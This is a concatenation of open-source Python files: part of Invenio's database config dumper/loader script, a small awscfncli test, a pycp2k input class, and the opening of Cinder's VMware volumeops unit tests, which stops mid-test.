'collection_portalbox':'collection_portalbox.id_portalbox = portalbox.id, collection_portalbox.id_collection = collection.id',
'portalbox':'normal',
},
'relations':'collection-collection_portalbox-portalbox',
},
}
def print_usage():
"""Print help."""
print __doc__
def create_section_id(num, with_date=True):
"""
Generate a unique section id.
Convert the given number in base 18 and append a 5 digit random string
If with_date=True append the date at the beginnig so it can be ordered.
Estructure:
if with_date:
date . base18(id) . 5 random chars e.g. tag.2010-07-30.ddcbz2lf
else:
base18(id) . 5 random chars e.g. field.ddcbz2lf
"""
digits = "abcdefghijklmnopqrstuvwxyz0123456789"
str_id = ""
tail = ''.join([random.choice(digits) for x in range(4)])
while 1:
rest = num % 18
str_id = digits[rest] + str_id
num = num / 18
if num == 0:
break
if with_date == True:
date = str(datetime.date.today())
return date + "." + str_id + tail
return str_id + tail
def dict2db(table_name, dict_data, mode):
"""
Load the dict values into the database
Three modes of operation:
i - insert
r - replace
c - correct
"""
#Escape all the content in dict data to avoid " and '
for data in dict_data:
dict_data[data] = re.escape(dict_data[data])
if mode == 'i': #Insert mode
query_fields = " , " .join(dict_data.keys())
query_values = "' , '" .join(dict_data.values())
query = "INSERT IGNORE INTO %s(%s) VALUES ('%s')" % (wash_table_column_name(table_name),
query_fields,
query_values)
elif mode == 'c': #Correct mode
if '_' in table_name:
query = "SELECT * FROM %s" % table_name#FIXIT Trick to execute something instead of giving error
else:
tbl_id = get_primary_keys(table_name)[0]
del dict_data[tbl_id]
query_update = " , " .join(["%s=\'%s\'" % (field, dict_data[field]) for field in dict_data])
query = "UPDATE %s SET %s" % (wash_table_column_name(table_name),
query_update)
else: #Try in the default mode
dict2db(table_name, dict_data, LOAD_DEFAULT_MODE)
try:
run_sql(query)
except:
print "VALUES: %s ALREADY EXIST IN TABLE %s. SKIPPING" % (query_values, table_name)
pass
def query2list(query, table_name):
"""Given a SQL query return a list of dictionaries with the results"""
results = run_sql(query, with_desc=True)
lst_results = []
dict_results = {}
for section_id, result in enumerate(results[0]):
dict_results = {}
for index, field in enumerate(results[1]):
if not is_blacklisted(table_name, field[0]):
dict_results[field[0]] = result[index]
lst_results.append(dict_results)
return lst_results
def get_primary_keys(table_name):
"""
Get the primary keys from the table with the DESC mysql function
"""
lst_keys = []
query = "DESC %s" % wash_table_column_name(table_name)
results = run_sql(query)
for field in results:
if field[3] == 'PRI':
lst_keys.append(field[0])
return lst_keys
def get_unused_primary_key(table_name):
"""
Returns the first free id from a table
"""
table_id = get_primary_keys(table_name)[0]#FIXIT the table can have more than an id
query = "SELECT %s FROM %s" % (table_id, table_name)
results = query2list(query, table_name)
list_used_ids = [result[table_id] for result in results]
for unused_id in range(1, len(list_used_ids)+2):
if not unused_id in list_used_ids:
return str(unused_id)
def is_blacklisted(table, field):
"""
Check if the current field is blacklisted, if so add the message to the messages list
"""
if (table+ "." + field) in BLACKLIST_TABLE_COLUMNS.keys():
msg = BLACKLIST_TABLE_COLUMNS[(table + "." + field)]
if not msg in MESSAGES:
MESSAGES.append(msg)
return True
return False
def get_relationship(collection, table, field_id):
"""Return the name of the related field"""
tbl_field = table + "." + field_id
dict_relationship = {}
for tbl in collection['tables'].values():
if tbl_field in tbl:
for foo in tbl.split(","):
dict_value, dict_key = foo.split("=")
dict_relationship[dict_key.strip()] = dict_value
return dict_relationship
def delete_keys_from_dict(dict_del, lst_keys):
"""
Delete the keys present in the lst_keys from the dictionary.
Loops recursively over nested dictionaries.
"""
for k in lst_keys:
try:
del dict_del[k]
except KeyError:
pass
for v in dict_del.values():
if isinstance(v, dict):
delete_keys_from_dict(v, lst_keys)
return dict_del
def extract_from_template(template, str_data):
"""
Extract the values from a string given the template
If the template and the string are different, this function may fail
Return a dictionary with the keys from the template and the values from the string
"""
#FIXIT this code can be more elegant
lst_str_data = []
dict_result = {}
pattern = re.compile("\$\w*")
patt_match = pattern.findall(template)
lst_foo = str_data.split("=")
for data in lst_foo:
lst_str_data.extend(data.split("."))
for index, data in enumerate(patt_match):
data = data.replace('$','')
dict_result[data] = lst_str_data[index+1].strip()
return dict_result
def delete_ids(dict_fields, lst_tables):
"""
Remove the ids of the tables from the dictionary
"""
lst_primary = []
for tbl in lst_tables:
lst_primary.extend(get_primary_keys(tbl))
return delete_keys_from_dict(dict_fields, lst_primary)
def add_special_field(collection, tbl_name , dict_data):
"""Add the value for the translation to the dictionary"""
str_template = collection['tables'][tbl_name].split(",")[1][:-1]#FIXIT if the final character is other?
template_key, template_value = str_template.split("=")
template_key = Template(template_key.strip())
template_value = Template(template_value.strip())
id_field = dict_data['id']
query = "SELECT * FROM %s WHERE %s=%s" % ("fieldname", "id_field", id_field)
result = query2list(query, "fieldname")
if result:
for res in result:
dict_data[template_key.safe_substitute(res)] = template_value.safe_substitute(res)
def dump_collection(collection, config, force_ids, print_to_screen=False):
"""
Dump the current collection
Note: there are a special notation, ori(origin) - rel(relation) - fin(final)
For example in the relation field-field_tag-tag:
ori(origin): field table
rel(relation): field_tag
fin(final): tag
"""
tbl_ori, tbl_rel, tbl_fin = collection['relations'].split("-")
query = "SELECT * FROM %s" % (wash_table_column_name(tbl_ori))
lst_ori = query2list(query, tbl_ori)
tbl_ori_id = get_primary_keys(tbl_ori)[0]
for index_ori, result_ori in enumerate(lst_ori):
dict_rels = get_relationship(collection, tbl_ori, tbl_ori_id)
query = "SELECT * FROM %s WHERE %s=%s" % (wash_table_column_name(tbl_rel),
dict_rels[tbl_ori+"."+tbl_ori_id],
result_ori[tbl_ori_id])
if collection['tables'][tbl_ori].startswith('extend'):
add_special_field(collection, tbl_ori, result_ori)
lst_rel = query2list(query, tbl_rel)
for result_rel in lst_rel:
tbl_fin_id = get_primary_keys(tbl_fin)[0]
tbl_rel_id = dict_rels[tbl_fin+"."+tbl_fin_id].split(".")[1].strip()
query = "SELECT * FROM %s WHERE %s=%s" % (wash_table_column_name(tbl_fin),
tbl_fin_id, result_rel[tbl_rel_id])
lst_fin = query2list(query, tbl_fin)
for index_fin, result_fin in enumerate(lst_fin):
result_ori[tbl_fin+"."+create_section_id(index_fin, with_date=False)] = result_fin
section_name = tbl_ori + "." + create_section_id(index_ori)
if force_ids == False:#Remove the ids from the dict
results = delete_ids(result_ori, collection['relations'].split("-"))
config[section_name] = results
else:
config[section_name] = result_ori
if print_to_screen == True:
output = StringIO.StringIO()
config.write(output)#Write to the output string instead of the file
print output.getvalue()
else:
config.write()
def get_collection(table_name):
"""Get the collection asociated with the section"""
for collection in COLLECTIONS.items():
if table_name in collection[1]['relations'].split("-")[0]:
return COLLECTIONS[collection[0]]#this is the collection to load
def load_section(section_name, dict_data, mode):
"""
Load the section back into the database
table_name is the name of the main section
There are some special notation: ori(origin) - rel(related) - fin(final) - ext(extended)
For example for the field-tag collection:
ori: field
ext: fieldname
rel: field_tag
fin:tag
"""
table_ori = section_name.split(".")[0]
collection = get_collection(table_ori)
ori_definition = collection['tables'][table_ori]
if ori_definition.startswith("extend"):
tbl_ext_name = ori_definition.split(",")[1].split(SEPARATOR)[0]
lst_tables = collection['relations'].split("-")
ori_id = get_primary_keys(lst_tables[0])[0]
ori_id_value = get_unused_primary_key(lst_tables[0])
dict_data[ori_id] = ori_id_value#Add the calculated id to the dictionary
#I will separate the dict_data into these 3 dicts corresponding to 3 different tables
dict_ori = {}
dict_rel = {}
dict_ext = {}
for field in dict_data:
if type(dict_data[field]) == str:#the field is a string
if "tbl_ext_name" in locals() and field.startswith(tbl_ext_name):#is extended table
dict2db("fieldname",
extract_from_template("fieldname.$ln.$type = $value",
str(field) + " = " + str(dict_data[field])),
mode)
else:
dict_ori[field] = dict_data[field]
else:#if the field is a dictionary
fin_id = get_primary_keys(lst_tables[2])[0]
fin_id_value = get_unused_primary_key(lst_tables[2])
dict_data[field][fin_id] = fin_id_value
dict2db(lst_tables[2], dict_data[field], mode)#Insert the final into the DB
fieldtag_ids = get_primary_keys(lst_tables[1])
dict_rel[fieldtag_ids[0]] = ori_id_value
dict_rel[fieldtag_ids[1]] = fin_id_value
dict2db(lst_tables[1], dict_rel, mode)#Insert the relation into the DB
dict2db(lst_tables[0], dict_ori, mode)
def cli_cmd_dump_config():
"""Dump the selected collection/s"""
config = ConfigObj(indent_type=IDENT_TYPE)
config.initial_comment = [
str(datetime.datetime.now()),
"This file is automatically generated by Invenio, running:",
" ".join(sys.argv) ,
"" ]
force_ids = False
if "--force-ids" in sys.argv:
force_ids = True
print_to_screen = False
if '--output' in sys.argv:
print_to_screen = True
try:
config.filename = sys.argv[sys.argv.index('-d') + 1]
except:
print_usage()
if '-col' in sys.argv:
try:
collection = COLLECTIONS[sys.argv[sys.argv.index('-col') + 1].upper()]
dump_collection(collection, config, force_ids, print_to_screen)
except:
print "ERROR: you must especify the collection to dump with the -col COLLECTION_NAME option"
elif '-all' in sys.argv:
for collection in COLLECTIONS:
dump_collection(COLLECTIONS[collection], config, force_ids, print_to_screen)
else:
print "Please specify the collection to dump"
def cli_cmd_load_config():
"""Load all the config sections back into the database"""
config = ConfigObj(sys.argv[sys.argv.index('-l') + 1])
mode = "r"
if '-mode' in sys.argv:
try:
mode = sys.argv[sys.argv.index('-mode') + 1]
if mode not in ['i', 'c', 'r']:
print "Not valid mode please select one of the following (i)nsert, (c)orrect or (r)eplace"
sys.exit(1)
except IndexError:
print "You must especify the mode with the -mode option"
sys.exit(1)
for section in config.sections:
load_section(section, config[section], mode)
def main():
"""
Main section, makes the calls to all the functions
"""
if "-d" in sys.argv:
cli_cmd_dump_config()
elif "-l" in sys.argv:
cli_cmd_load_config()
elif "-h" in sys.argv:
print_usage()
else:
print_usage()
for message in MESSAGES:
print message
if __name__ == '__main__':
main()
| Panos512/invenio | modules/miscutil/lib/inveniocfg_dumperloader.py | Python | gpl-2.0 | 16,700 |
from awscfncli2.runner import Boto3Profile
class TestStackSelector(object):
def test_update(self):
s1 = Boto3Profile('foo','bar')
s2 = Boto3Profile('foo', 'baz')
assert s1.region_name == 'bar'
s1.update(s2)
| Kotaimen/awscfncli | tests/unit/runner/test_bobo3_profile.py | Python | mit | 246 |
from pycp2k.inputsection import InputSection
class _each397(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Just_energy = None
self.Powell_opt = None
self.Qs_scf = None
self.Xas_scf = None
self.Md = None
self.Pint = None
self.Metadynamics = None
self.Geo_opt = None
self.Rot_opt = None
self.Cell_opt = None
self.Band = None
self.Ep_lin_solver = None
self.Spline_find_coeffs = None
self.Replica_eval = None
self.Bsse = None
self.Shell_opt = None
self.Tddft_scf = None
self._name = "EACH"
self._keywords = {'Bsse': 'BSSE', 'Cell_opt': 'CELL_OPT', 'Just_energy': 'JUST_ENERGY', 'Band': 'BAND', 'Xas_scf': 'XAS_SCF', 'Rot_opt': 'ROT_OPT', 'Replica_eval': 'REPLICA_EVAL', 'Tddft_scf': 'TDDFT_SCF', 'Shell_opt': 'SHELL_OPT', 'Md': 'MD', 'Pint': 'PINT', 'Metadynamics': 'METADYNAMICS', 'Geo_opt': 'GEO_OPT', 'Spline_find_coeffs': 'SPLINE_FIND_COEFFS', 'Powell_opt': 'POWELL_OPT', 'Qs_scf': 'QS_SCF', 'Ep_lin_solver': 'EP_LIN_SOLVER'}
| SINGROUP/pycp2k | pycp2k/classes/_each397.py | Python | lgpl-3.0 | 1,114 |
# Copyright (c) 2014 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Test suite for VMware VMDK driver volumeops module.
"""
import mock
from oslo_utils import units
from oslo_vmware import exceptions
from oslo_vmware import vim_util
from cinder import test
from cinder.volume.drivers.vmware import exceptions as vmdk_exceptions
from cinder.volume.drivers.vmware import volumeops
class VolumeOpsTestCase(test.TestCase):
"""Unit tests for volumeops module."""
MAX_OBJECTS = 100
def setUp(self):
super(VolumeOpsTestCase, self).setUp()
self.session = mock.MagicMock()
self.vops = volumeops.VMwareVolumeOps(self.session, self.MAX_OBJECTS)
def test_split_datastore_path(self):
test1 = '[datastore1] myfolder/mysubfolder/myvm.vmx'
(datastore, folder, file_name) = volumeops.split_datastore_path(test1)
self.assertEqual(datastore, 'datastore1')
self.assertEqual(folder, 'myfolder/mysubfolder/')
self.assertEqual(file_name, 'myvm.vmx')
test2 = '[datastore2 ] myfolder/myvm.vmdk'
(datastore, folder, file_name) = volumeops.split_datastore_path(test2)
self.assertEqual(datastore, 'datastore2')
self.assertEqual(folder, 'myfolder/')
self.assertEqual(file_name, 'myvm.vmdk')
test3 = 'myfolder/myvm.vmdk'
self.assertRaises(IndexError, volumeops.split_datastore_path, test3)
def vm(self, val):
"""Create a mock vm in retrieve result format."""
vm = mock.MagicMock()
prop = mock.Mock(spec=object)
prop.val = val
vm.propSet = [prop]
return vm
def test_get_backing(self):
name = 'mock-backing'
# Test no result
self.session.invoke_api.return_value = None
result = self.vops.get_backing(name)
self.assertIsNone(result)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_objects',
self.session.vim,
'VirtualMachine',
self.MAX_OBJECTS)
# Test single result
vm = self.vm(name)
vm.obj = mock.sentinel.vm_obj
retrieve_result = mock.Mock(spec=object)
retrieve_result.objects = [vm]
self.session.invoke_api.return_value = retrieve_result
self.vops.cancel_retrieval = mock.Mock(spec=object)
result = self.vops.get_backing(name)
self.assertEqual(mock.sentinel.vm_obj, result)
self.session.invoke_api.assert_called_with(vim_util, 'get_objects',
self.session.vim,
'VirtualMachine',
self.MAX_OBJECTS)
self.vops.cancel_retrieval.assert_called_once_with(retrieve_result)
# Test multiple results
retrieve_result2 = mock.Mock(spec=object)
retrieve_result2.objects = [vm('1'), vm('2'), vm('3')]
self.session.invoke_api.return_value = retrieve_result2
self.vops.continue_retrieval = mock.Mock(spec=object)
self.vops.continue_retrieval.return_value = retrieve_result
result = self.vops.get_backing(name)
self.assertEqual(mock.sentinel.vm_obj, result)
self.session.invoke_api.assert_called_with(vim_util, 'get_objects',
self.session.vim,
'VirtualMachine',
self.MAX_OBJECTS)
self.vops.continue_retrieval.assert_called_once_with(retrieve_result2)
self.vops.cancel_retrieval.assert_called_with(retrieve_result)
def test_delete_backing(self):
backing = mock.sentinel.backing
task = mock.sentinel.task
self.session.invoke_api.return_value = task
self.vops.delete_backing(backing)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"Destroy_Task",
backing)
self.session.wait_for_task(task)
def test_get_host(self):
instance = mock.sentinel.instance
host = mock.sentinel.host
self.session.invoke_api.return_value = host
result = self.vops.get_host(instance)
self.assertEqual(host, result)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
instance,
'runtime.host')
def test_get_hosts(self):
hosts = mock.sentinel.hosts
self.session.invoke_api.return_value = hosts
result = self.vops.get_hosts()
self.assertEqual(hosts, result)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_objects',
self.session.vim,
'HostSystem',
self.MAX_OBJECTS)
def test_continue_retrieval(self):
retrieve_result = mock.sentinel.retrieve_result
self.session.invoke_api.return_value = retrieve_result
result = self.vops.continue_retrieval(retrieve_result)
self.assertEqual(retrieve_result, result)
self.session.invoke_api.assert_called_once_with(vim_util,
'continue_retrieval',
self.session.vim,
retrieve_result)
def test_cancel_retrieval(self):
retrieve_result = mock.sentinel.retrieve_result
self.session.invoke_api.return_value = retrieve_result
result = self.vops.cancel_retrieval(retrieve_result)
self.assertIsNone(result)
self.session.invoke_api.assert_called_once_with(vim_util,
'cancel_retrieval',
self.session.vim,
retrieve_result)
def test_is_usable(self):
mount_info = mock.Mock(spec=object)
mount_info.accessMode = "readWrite"
mount_info.mounted = True
mount_info.accessible = True
self.assertTrue(self.vops._is_usable(mount_info))
del mount_info.mounted
self.assertTrue(self.vops._is_usable(mount_info))
mount_info.accessMode = "readonly"
self.assertFalse(self.vops._is_usable(mount_info))
mount_info.accessMode = "readWrite"
mount_info.mounted = False
self.assertFalse(self.vops._is_usable(mount_info))
mount_info.mounted = True
mount_info.accessible = False
self.assertFalse(self.vops._is_usable(mount_info))
del mount_info.accessible
self.assertFalse(self.vops._is_usable(mount_info))
def _create_host_mounts(self, access_mode, host, set_accessible=True,
is_accessible=True, mounted=True):
"""Create host mount value of datastore with single mount info.
:param access_mode: string specifying the read/write permission
:param set_accessible: specify whether accessible property
should be set
:param is_accessible: boolean specifying whether the datastore
is accessible to host
:param host: managed object reference of the connected
host
:return: list of host mount info
"""
mntInfo = mock.Mock(spec=object)
mntInfo.accessMode = access_mode
if set_accessible:
mntInfo.accessible = is_accessible
else:
del mntInfo.accessible
mntInfo.mounted = mounted
host_mount = mock.Mock(spec=object)
host_mount.key = host
host_mount.mountInfo = mntInfo
host_mounts = mock.Mock(spec=object)
host_mounts.DatastoreHostMount = [host_mount]
return host_mounts
def test_get_connected_hosts(self):
with mock.patch.object(self.vops, 'get_summary') as get_summary:
datastore = mock.sentinel.datastore
summary = mock.Mock(spec=object)
get_summary.return_value = summary
summary.accessible = False
hosts = self.vops.get_connected_hosts(datastore)
self.assertEqual([], hosts)
summary.accessible = True
host = mock.Mock(spec=object)
host.value = mock.sentinel.host
host_mounts = self._create_host_mounts("readWrite", host)
self.session.invoke_api.return_value = host_mounts
hosts = self.vops.get_connected_hosts(datastore)
self.assertEqual([mock.sentinel.host], hosts)
self.session.invoke_api.assert_called_once_with(
vim_util,
'get_object_property',
self.session.vim,
datastore,
'host')
del host_mounts.DatastoreHostMount
hosts = self.vops.get_connected_hosts(datastore)
self.assertEqual([], hosts)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'get_connected_hosts')
def test_is_datastore_accessible(self, get_connected_hosts):
host_1 = mock.sentinel.host_1
host_2 = mock.sentinel.host_2
get_connected_hosts.return_value = [host_1, host_2]
ds = mock.sentinel.datastore
host = mock.Mock(value=mock.sentinel.host_1)
self.assertTrue(self.vops.is_datastore_accessible(ds, host))
get_connected_hosts.assert_called_once_with(ds)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'get_connected_hosts')
def test_is_datastore_accessible_with_inaccessible(self,
get_connected_hosts):
host_1 = mock.sentinel.host_1
get_connected_hosts.return_value = [host_1]
ds = mock.sentinel.datastore
host = mock.Mock(value=mock.sentinel.host_2)
self.assertFalse(self.vops.is_datastore_accessible(ds, host))
get_connected_hosts.assert_called_once_with(ds)
def test_is_valid(self):
with mock.patch.object(self.vops, 'get_summary') as get_summary:
summary = mock.Mock(spec=object)
get_summary.return_value = summary
datastore = mock.sentinel.datastore
host = mock.Mock(spec=object)
host.value = mock.sentinel.host
def _is_valid(host_mounts, is_valid):
self.session.invoke_api.return_value = host_mounts
result = self.vops._is_valid(datastore, host)
self.assertEqual(is_valid, result)
self.session.invoke_api.assert_called_with(
vim_util,
'get_object_property',
self.session.vim,
datastore,
'host')
# Test positive cases
summary.maintenanceMode = 'normal'
summary.accessible = True
_is_valid(self._create_host_mounts("readWrite", host), True)
# Test negative cases
_is_valid(self._create_host_mounts("Inaccessible", host), False)
_is_valid(self._create_host_mounts("readWrite", host, True, False),
False)
_is_valid(self._create_host_mounts("readWrite", host, True, True,
False), False)
summary.accessible = False
_is_valid(self._create_host_mounts("readWrite", host, False),
False)
summary.accessible = True
summary.maintenanceMode = 'inMaintenance'
_is_valid(self._create_host_mounts("readWrite", host), False)
def test_get_dss_rp(self):
with mock.patch.object(self.vops, 'get_summary') as get_summary:
summary = mock.Mock(spec=object)
summary.accessible = True
summary.maintenanceModel = 'normal'
get_summary.return_value = summary
# build out props to be returned by 1st invoke_api call
datastore_prop = mock.Mock(spec=object)
datastore_prop.name = 'datastore'
datastore_prop.val = mock.Mock(spec=object)
datastore_prop.val.ManagedObjectReference = [mock.sentinel.ds1,
mock.sentinel.ds2]
compute_resource_prop = mock.Mock(spec=object)
compute_resource_prop.name = 'parent'
compute_resource_prop.val = mock.sentinel.compute_resource
elem = mock.Mock(spec=object)
elem.propSet = [datastore_prop, compute_resource_prop]
props = [elem]
# build out host_mounts to be returned by 2nd invoke_api call
host = mock.Mock(spec=object)
host.value = mock.sentinel.host
host_mounts = self._create_host_mounts("readWrite", host)
# build out resource_pool to be returned by 3rd invoke_api call
resource_pool = mock.sentinel.resource_pool
# set return values for each call of invoke_api
self.session.invoke_api.side_effect = [props,
host_mounts,
host_mounts,
resource_pool]
# invoke function and verify results
(dss_actual, rp_actual) = self.vops.get_dss_rp(host)
self.assertEqual([mock.sentinel.ds1, mock.sentinel.ds2],
dss_actual)
self.assertEqual(resource_pool, rp_actual)
# invoke function with no valid datastore
summary.maintenanceMode = 'inMaintenance'
self.session.invoke_api.side_effect = [props,
host_mounts,
host_mounts,
resource_pool]
self.assertRaises(exceptions.VimException,
self.vops.get_dss_rp,
host)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_get_parent(self):
# Not recursive
child = mock.Mock(spec=object)
child._type = 'Parent'
ret = self.vops._get_parent(child, 'Parent')
self.assertEqual(ret, child)
# Recursive
parent = mock.Mock(spec=object)
parent._type = 'Parent'
child = mock.Mock(spec=object)
child._type = 'Child'
self.session.invoke_api.return_value = parent
ret = self.vops._get_parent(child, 'Parent')
self.assertEqual(ret, parent)
self.session.invoke_api.assert_called_with(vim_util,
'get_object_property',
self.session.vim, child,
'parent')
def test_get_dc(self):
# set up hierarchy of objects
dc = mock.Mock(spec=object)
dc._type = 'Datacenter'
o1 = mock.Mock(spec=object)
o1._type = 'mockType1'
o1.parent = dc
o2 = mock.Mock(spec=object)
o2._type = 'mockType2'
o2.parent = o1
# mock out invoke_api behaviour to fetch parent
def mock_invoke_api(vim_util, method, vim, the_object, arg):
return the_object.parent
self.session.invoke_api.side_effect = mock_invoke_api
ret = self.vops.get_dc(o2)
self.assertEqual(dc, ret)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_get_vmfolder(self):
self.session.invoke_api.return_value = mock.sentinel.ret
ret = self.vops.get_vmfolder(mock.sentinel.dc)
self.assertEqual(mock.sentinel.ret, ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
mock.sentinel.dc,
'vmFolder')
def test_create_folder_with_empty_vmfolder(self):
"""Test create_folder when the datacenter vmFolder is empty"""
child_folder = mock.sentinel.child_folder
self.session.invoke_api.side_effect = [None, child_folder]
parent_folder = mock.sentinel.parent_folder
child_name = 'child_folder'
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_folder, ret)
expected_calls = [mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(self.session.vim, 'CreateFolder',
parent_folder, name=child_name)]
self.assertEqual(expected_calls,
self.session.invoke_api.call_args_list)
def test_create_folder_not_present(self):
"""Test create_folder when child not present."""
parent_folder = mock.sentinel.parent_folder
child_name = 'child_folder'
prop_val = mock.Mock(spec=object)
prop_val.ManagedObjectReference = []
child_folder = mock.sentinel.child_folder
self.session.invoke_api.side_effect = [prop_val, child_folder]
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_folder, ret)
expected_invoke_api = [mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(self.session.vim, 'CreateFolder',
parent_folder, name=child_name)]
self.assertEqual(expected_invoke_api,
self.session.invoke_api.mock_calls)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_create_folder_already_present(self):
"""Test create_folder when child already present."""
parent_folder = mock.sentinel.parent_folder
child_name = 'child_folder'
prop_val = mock.Mock(spec=object)
child_entity_1 = mock.Mock(spec=object)
child_entity_1._type = 'Folder'
child_entity_1_name = 'SomeOtherName'
child_entity_2 = mock.Mock(spec=object)
child_entity_2._type = 'Folder'
child_entity_2_name = child_name
prop_val.ManagedObjectReference = [child_entity_1, child_entity_2]
self.session.invoke_api.side_effect = [prop_val, child_entity_1_name,
child_entity_2_name]
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_entity_2, ret)
expected_invoke_api = [mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(vim_util, 'get_object_property',
self.session.vim, child_entity_1,
'name'),
mock.call(vim_util, 'get_object_property',
self.session.vim, child_entity_2,
'name')]
self.assertEqual(expected_invoke_api,
self.session.invoke_api.mock_calls)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_create_folder_with_special_characters(self):
"""Test create_folder with names containing special characters."""
# Test folder already exists case.
child_entity_1 = mock.Mock(_type='Folder')
child_entity_1_name = 'cinder-volumes'
child_entity_2 = mock.Mock(_type='Folder')
child_entity_2_name = '%2fcinder-volumes'
prop_val = mock.Mock(ManagedObjectReference=[child_entity_1,
child_entity_2])
self.session.invoke_api.side_effect = [prop_val,
child_entity_1_name,
child_entity_2_name]
parent_folder = mock.sentinel.parent_folder
child_name = '/cinder-volumes'
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_entity_2, ret)
# Test non-existing folder case.
child_entity_2_name = '%25%25cinder-volumes'
new_child_folder = mock.sentinel.new_child_folder
self.session.invoke_api.side_effect = [prop_val,
child_entity_1_name,
child_entity_2_name,
new_child_folder]
child_name = '%cinder-volumes'
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(new_child_folder, ret)
self.session.invoke_api.assert_called_with(self.session.vim,
'CreateFolder',
parent_folder,
name=child_name)
# Reset side effects.
self.session.invoke_api.side_effect = None
def test_create_disk_backing_thin(self):
backing = mock.Mock()
del backing.eagerlyScrub
cf = self.session.vim.client.factory
cf.create.return_value = backing
disk_type = 'thin'
ret = self.vops._create_disk_backing(disk_type, None)
self.assertEqual(backing, ret)
self.assertIsInstance(ret.thinProvisioned, bool)
self.assertTrue(ret.thinProvisioned)
self.assertEqual('', ret.fileName)
self.assertEqual('persistent', ret.diskMode)
def test_create_disk_backing_thick(self):
backing = mock.Mock()
del backing.eagerlyScrub
del backing.thinProvisioned
cf = self.session.vim.client.factory
cf.create.return_value = backing
disk_type = 'thick'
ret = self.vops._create_disk_backing(disk_type, None)
self.assertEqual(backing, ret)
self.assertEqual('', ret.fileName)
self.assertEqual('persistent', ret.diskMode)
def test_create_disk_backing_eager_zeroed_thick(self):
backing = mock.Mock()
del backing.thinProvisioned
cf = self.session.vim.client.factory
cf.create.return_value = backing
disk_type = 'eagerZeroedThick'
ret = self.vops._create_disk_backing(disk_type, None)
self.assertEqual(backing, ret)
self.assertIsInstance(ret.eagerlyScrub, bool)
self.assertTrue(ret.eagerlyScrub)
self.assertEqual('', ret.fileName)
self.assertEqual('persistent', ret.diskMode)
def test_create_virtual_disk_config_spec(self):
cf = self.session.vim.client.factory
cf.create.side_effect = lambda *args: mock.Mock()
size_kb = units.Ki
controller_key = 200
disk_type = 'thick'
spec = self.vops._create_virtual_disk_config_spec(size_kb,
disk_type,
controller_key,
None)
cf.create.side_effect = None
self.assertEqual('add', spec.operation)
self.assertEqual('create', spec.fileOperation)
device = spec.device
self.assertEqual(size_kb, device.capacityInKB)
self.assertEqual(-101, device.key)
self.assertEqual(0, device.unitNumber)
self.assertEqual(controller_key, device.controllerKey)
backing = device.backing
self.assertEqual('', backing.fileName)
self.assertEqual('persistent', backing.diskMode)
def test_create_specs_for_ide_disk_add(self):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
size_kb = 1
disk_type = 'thin'
adapter_type = 'ide'
ret = self.vops._create_specs_for_disk_add(size_kb, disk_type,
adapter_type)
factory.create.side_effect = None
self.assertEqual(1, len(ret))
self.assertEqual(units.Ki, ret[0].device.capacityInKB)
self.assertEqual(200, ret[0].device.controllerKey)
expected = [mock.call.create('ns0:VirtualDeviceConfigSpec'),
mock.call.create('ns0:VirtualDisk'),
mock.call.create('ns0:VirtualDiskFlatVer2BackingInfo')]
factory.create.assert_has_calls(expected, any_order=True)
def test_create_specs_for_scsi_disk_add(self):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
size_kb = 2 * units.Ki
disk_type = 'thin'
adapter_type = 'lsiLogicsas'
ret = self.vops._create_specs_for_disk_add(size_kb, disk_type,
adapter_type)
factory.create.side_effect = None
self.assertEqual(2, len(ret))
self.assertEqual('noSharing', ret[1].device.sharedBus)
self.assertEqual(size_kb, ret[0].device.capacityInKB)
expected = [mock.call.create('ns0:VirtualLsiLogicSASController'),
mock.call.create('ns0:VirtualDeviceConfigSpec'),
mock.call.create('ns0:VirtualDisk'),
mock.call.create('ns0:VirtualDiskFlatVer2BackingInfo'),
mock.call.create('ns0:VirtualDeviceConfigSpec')]
factory.create.assert_has_calls(expected, any_order=True)
def test_get_create_spec_disk_less(self):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
name = mock.sentinel.name
ds_name = mock.sentinel.ds_name
profile_id = mock.sentinel.profile_id
ret = self.vops._get_create_spec_disk_less(name, ds_name, profile_id)
factory.create.side_effect = None
self.assertEqual(name, ret.name)
self.assertEqual('[%s]' % ds_name, ret.files.vmPathName)
self.assertEqual("vmx-08", ret.version)
self.assertEqual(profile_id, ret.vmProfile[0].profileId)
expected = [mock.call.create('ns0:VirtualMachineFileInfo'),
mock.call.create('ns0:VirtualMachineConfigSpec'),
mock.call.create('ns0:VirtualMachineDefinedProfileSpec')]
factory.create.assert_has_calls(expected, any_order=True)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'get_create_spec')
def test_create_backing(self, get_create_spec):
create_spec = mock.sentinel.create_spec
get_create_spec.return_value = create_spec
task = mock.sentinel.task
self.session.invoke_api.return_value = task
